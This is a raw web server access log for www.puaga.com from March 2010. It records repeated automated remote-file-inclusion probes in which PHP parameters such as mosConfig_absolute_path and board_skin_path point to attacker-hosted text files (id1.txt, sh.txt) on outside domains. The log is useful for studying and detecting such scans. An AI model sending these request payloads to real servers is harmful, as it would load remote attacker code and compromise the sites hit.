58.150.99.144 - - [07/Mar/2010:09:18:32 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:09:18:33 -0800] "GET /logs//atom.php5?page=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:09:18:33 -0800] "GET /logs/access_100202.log%20%20//atom.php5?page=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:09:18:34 -0800] "GET /atom.php5?page=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:18:48 -0800] "GET /logs/access_100226.log////?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:18:48 -0800] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:19:39 -0800] "GET /logs///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:19:40 -0800] "GET //bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:19:40 -0800] "GET /logs/access_100128.log///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:19:42 -0800] "GET /logs/access_100201.log%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:19:42 -0800] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:19:42 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:20:08 -0800] "GET /logs/access_100214.log///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:09:20:52 -0800] "GET /logs/access_100202.log//atom.php5?page=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:09:21:02 -0800] "GET /logs/access_100129.log//atom.php5?page=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:22:40 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:22:40 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:22:40 -0800] "GET /logs/access_100205.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:22:54 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:22:54 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:22:59 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:23:06 -0800] "GET //bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:23:06 -0800] "GET /logs///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:23:06 -0800] "GET /logs/access_100128.log///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:23:28 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:24:03 -0800] "GET /logs/access_100226.log////?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:24:03 -0800] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:24:04 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:24:14 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:24:25 -0800] "GET /logs/access_100201.log////?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:24:45 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:24:45 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:24:45 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:24:45 -0800] "GET //bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:24:46 -0800] "GET /logs///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:24:46 -0800] "GET /logs/access_100128.log%20%20///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:25:11 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:27:29 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:27:29 -0800] "GET /logs/access_100226.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:27:29 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:09:28:59 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:09:28:59 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [07/Mar/2010:09:28:59 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:29:33 -0800] "GET /logs/access_100214.log%20%20///bbs/write_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:31:23 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:31:23 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:31:23 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:31:24 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:31:24 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:31:24 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:34:26 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:34:41 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [07/Mar/2010:09:35:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hn.or.kr/bbs/inj/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [07/Mar/2010:09:35:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hn.or.kr/bbs/inj/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [07/Mar/2010:09:35:38 -0800] "GET /logs/access_100131.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hn.or.kr/bbs/inj/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:36:57 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:36:57 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:36:57 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:37:07 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:37:07 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:37:07 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:37:15 -0800] "GET /logs/access_100222.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:37:15 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:37:16 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:37:56 -0800] "GET /appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:37:56 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:37:56 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:05 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:05 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:05 -0800] "GET /appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:11 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:11 -0800] "GET /appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:18 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:49 -0800] "GET /logs/access_100206.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:51 -0800] "GET /logs/access_100206.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [07/Mar/2010:09:38:52 -0800] "GET /logs/access_100206.log//appserv/main.php?appserv_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:39:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:39:24 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:39:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:40:00 -0800] "GET /editor/editor.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:40:01 -0800] "GET /logs/access_100212.log%20%20//editor/editor.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:40:01 -0800] "GET /logs//editor/editor.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:40:31 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:40:32 -0800] "GET /?_SERVER[DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:40:33 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [07/Mar/2010:09:40:33 -0800] "GET /logs/access_100219.log%20%20//editor/editor.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:40:38 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:40:41 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.234.132.164 - - [07/Mar/2010:09:43:15 -0800] "GET /logs/access_100222.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:37 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:38 -0800] "GET /logs/access_100227.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:44 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:43:48 -0800] "GET /logs/access_100227.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:09:44:49 -0800] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:09:44:49 -0800] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:09:44:49 -0800] "GET /logs/access_100131.log%20%20/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:09:44:52 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:09:44:53 -0800] "GET /logs/access_100223.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:09:44:53 -0800] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:09:45:20 -0800] "GET /logs/access_100217.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:06 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:06 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:06 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:07 -0800] "GET /logs/access_100218.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:07 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:46:07 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
